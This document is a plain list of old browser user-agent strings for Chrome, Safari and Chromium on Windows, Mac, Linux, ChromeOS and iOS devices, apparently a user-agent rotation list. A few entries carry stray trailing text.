Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.599.0 Safari/534.13
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.44 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.19 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.596.0 Safari/534.13
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/9.10 Chromium/9.0.592.0 Chrome/9.0.592.0 Safari/534.13
Mozilla/5.0 (X11; U; Windows NT 6; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.587.0 Safari/534.12
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0 Safari/534.12
Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.576.0 Safari/534.12
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/8.1.0.0 Safari/540.0
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.130; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.344 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.343 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.341 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339 Safari/534.10
Mozilla/5.0 (X11; U; CrOS i686 0.9.128; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.339
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/533.3
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.210 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.200 Safari/534.10
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.551.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.548.0 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.544.0 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.15) Gecko/20101027 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.9 (KHTML, like Gecko) Chrome/7.0.531.0 Safari/534.9
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.8 (KHTML, like Gecko) Chrome/7.0.521.0 Safari/534.8
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.24 Safari/534.7
Mozilla/5.0 (X11; U; Linux x86_64; fr-FR) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr-FR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; sv-se) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ko-kr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-ch) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; ar) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; tr-TR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8G4 Safari/6533.18.5
Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; he-il) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; fr; CPU iPhone OS 4_2_1 like Mac OS X; fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_1 like Mac OS X; zh-tw) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8G4 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; pl-pl) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; fr-fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; nb-no) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; it-it) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; fi-fi) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148a Safari/6533.18.5
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; fi-fi) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; th-th) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+
Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; zh-cn) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ru-ru) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ko-kr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/534.1+ (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-au) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; el-gr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ca-es) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-tw) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fr-fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-en) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; nl-nl) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de-de) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/533.4 (KHTML, like Gecko) Version/4.1 Safari/533.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081212 Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-gb) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-gb) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; da-dk) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/533.4+ (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B5097d Safari/6531.22.7
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/123
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-TW) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE) AppleWebKit/532+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; hu-hu) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ru-ru) AppleWebKit/533.2+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; de-at) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 (iPhone Simulator; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7D11 Safari/531.21.10
Mozilla/5.0 (iPad; U; CPU OS 3_2_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B500 Safari/53
Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10
Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; es-es) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B360 Safari/531.21.10
Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.1021.10gin_lib.cc
Mozilla/5.0 (iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9.2009
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; nl-nl) AppleWebKit/532.3+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9
